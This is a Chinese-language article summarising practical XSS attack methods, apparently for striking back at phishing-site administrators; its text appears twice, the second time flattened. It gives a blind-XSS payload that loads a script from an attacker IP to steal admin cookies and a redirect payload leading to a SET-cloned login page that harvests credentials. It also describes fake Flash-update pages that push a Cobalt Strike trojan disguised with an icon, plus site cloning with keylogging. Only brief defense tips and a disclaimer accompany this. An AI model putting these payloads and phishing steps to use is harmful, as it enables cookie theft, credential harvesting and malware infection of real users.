XSS 实战攻击思路总结
字数 1217 2025-08-18 11:35:44

XSS实战攻击思路总结

前言

本文总结了XSS(跨站脚本攻击)的多种实战攻击思路,通过实际案例演示如何利用XSS漏洞进行攻击。这些技术仅供网络安全学习和研究使用,禁止用于非法用途。

钓鱼网站鉴别方法

域名分析

  1. 检查一级域名是否合法
    • 示例:qq.xps.com中"qq"是二级域名,一级域名xps.com暴露了钓鱼本质
  2. 注意拉丁字母伪造域名
    • 示例:
      • 真域名:www.oppo.com
      • 假域名:www.οppο.com (使用希腊字母ο代替o)
      • 真域名:www.pornhub.com
      • 假域名:www.ρornhub.com (使用希腊字母ρ代替p)

功能分析

  1. 使用目录扫描工具发现后台
    • 示例:dirsearch扫描发现后台登录口http://qq.xps.com/admin/login.php
  2. 观察钓鱼流程
    • 用户输入账号密码后跳转至真实网站
    • 让用户误以为第一次是输入错误

XSS攻击思路

思路一:XSS盲打

  1. 准备XSS平台
    • 推荐BlueLotus_XSSReceiver
    • 项目地址:https://github.com/sqlsec/BlueLotus_XSSReceiver
  2. 生成XSS payload 
    <script src=http://10.20.24.244/xss/myjs/x.js></script>
  3. 插入payload
    • 优先选择密码输入框
    • 如有长度限制,审查元素修改input长度
  4. 获取管理员cookie
    • 当管理员查看钓鱼记录时触发XSS
    • 获取后台地址和cookie后可登录后台

思路二:SET钓鱼(针对HttpOnly)

  1. 使用Kali Linux的SET工具
    • 项目地址:https://github.com/trustedsec/social-engineer-toolkit
  2. 操作步骤: 
    1) Social-Engineering Attacks
2) Website Attack Vectors
3) Credential Harvester Attack Method
2) Site Cloner
  3. 克隆目标网站后台登录页面
  4. 使用XSS诱导管理员访问克隆页面 
    <script>window.location.href="http://10.20.25.39/"</script>
  5. 获取管理员输入的明文凭证

思路三:Flash钓鱼

  1. 准备钓鱼页面
    • 项目1:模仿Flash Player中文官网
      • 地址:https://github.com/Wileysec/adobe-flash-phishing-page
    • 项目2:激进提示升级页面
      • 地址:https://github.com/r00tSe7en/Flash-Pop
  2. 诱导下载恶意程序
    • 示例:"立即升级"按钮下载CS木马
  3. 木马上线
    • 建议为木马添加图标伪装
    • 参考:为Cobalt Strike exe木马添加图标

其他思路补充

  1. 使用Cobalt Strike克隆网站

    • 操作路径:"攻击"-"钓鱼攻击"-"克隆网站"
    • 勾选键盘记录功能
    • 相比SET能模仿更多复杂网站(约85%相似度)

  2. OpenResty反代方案

    • 使用OpenResty反代目标网站实现完全镜像
    • 在尾部插入自定义JS代码

防御建议

  1. 对用户输入进行严格过滤
  2. 设置HttpOnly属性保护cookie
  3. 保持警惕,注意域名细节
  4. 谨慎点击不明链接和下载

免责声明

本文所述技术仅供网络安全学习和研究使用,禁止用于非法用途。使用者需自行承担相关法律责任。

XSS实战攻击思路总结 前言 本文总结了XSS(跨站脚本攻击)的多种实战攻击思路,通过实际案例演示如何利用XSS漏洞进行攻击。这些技术仅供网络安全学习和研究使用,禁止用于非法用途。 钓鱼网站鉴别方法 域名分析 检查一级域名是否合法 示例:qq.xps.com中"qq"是二级域名,一级域名xps.com暴露了钓鱼本质 注意拉丁字母伪造域名 示例: 真域名:www.oppo.com 假域名:www.οppο.com (使用希腊字母ο代替o) 真域名:www.pornhub.com 假域名:www.ρornhub.com (使用希腊字母ρ代替p) 功能分析 使用目录扫描工具发现后台 示例:dirsearch扫描发现后台登录口http://qq.xps.com/admin/login.php 观察钓鱼流程 用户输入账号密码后跳转至真实网站 让用户误以为第一次是输入错误 XSS攻击思路 思路一:XSS盲打 准备XSS平台 推荐BlueLotus_ XSSReceiver 项目地址:https://github.com/sqlsec/BlueLotus_ XSSReceiver 生成XSS payload 插入payload 优先选择密码输入框 如有长度限制,审查元素修改input长度 获取管理员cookie 当管理员查看钓鱼记录时触发XSS 获取后台地址和cookie后可登录后台 思路二:SET钓鱼(针对HttpOnly) 使用Kali Linux的SET工具 项目地址:https://github.com/trustedsec/social-engineer-toolkit 操作步骤: 克隆目标网站后台登录页面 使用XSS诱导管理员访问克隆页面 获取管理员输入的明文凭证 思路三:Flash钓鱼 准备钓鱼页面 项目1:模仿Flash Player中文官网 地址:https://github.com/Wileysec/adobe-flash-phishing-page 项目2:激进提示升级页面 地址:https://github.com/r00tSe7en/Flash-Pop 诱导下载恶意程序 示例:"立即升级"按钮下载CS木马 木马上线 建议为木马添加图标伪装 参考:为Cobalt Strike exe木马添加图标 其他思路补充 使用Cobalt Strike克隆网站 操作路径:"攻击"-"钓鱼攻击"-"克隆网站" 勾选键盘记录功能 相比SET能模仿更多复杂网站(约85%相似度) OpenResty反代方案 使用OpenResty反代目标网站实现完全镜像 在尾部插入自定义JS代码 防御建议 对用户输入进行严格过滤 设置HttpOnly属性保护cookie 保持警惕,注意域名细节 谨慎点击不明链接和下载 免责声明 本文所述技术仅供网络安全学习和研究使用,禁止用于非法用途。使用者需自行承担相关法律责任。